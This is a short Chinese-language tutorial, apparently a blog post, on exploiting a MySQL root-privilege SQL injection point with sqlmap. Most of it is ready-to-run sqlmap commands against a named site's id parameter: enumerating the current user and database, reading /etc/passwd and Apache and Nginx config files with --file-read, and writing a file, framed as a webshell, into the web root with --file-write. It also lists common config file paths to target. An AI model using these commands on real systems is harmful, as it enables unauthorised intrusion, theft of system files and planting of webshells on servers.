天天看點

sqlmap注入mysql_sqlmap之mysql root權限注入點

遇到一mysql root權限注入點,嘗試用sqlmap進一步滲透擷取更高權限,具體如下:

判斷注入點的目前使用者和目前資料庫

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-user

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --current-db

root權限注入點可以嘗試讀取系統檔案,比如/etc/passwd,以及apache,nginx的配置檔案等,相關配置檔案路徑如下:

nginx: usr/local/nginx/conf/nginx.conf

常用的apache配置檔案路徑有:

/etc/httpd/conf/httpd.conf

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

sqlmap讀取檔案文法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" --file-read "/etc/passwd"

如果magic_quotes_gpc=off就可以嘗試進行寫入Webshell,sqlmap寫入檔案文法:

./sqlmap.py -u "http://www.nxadmin.com/sql-injection.php?id=1" –file-write /test/test.txt –file-dest /var/www/html/1.txt

将本地的test.txt寫入到站點伺服器的html目錄下。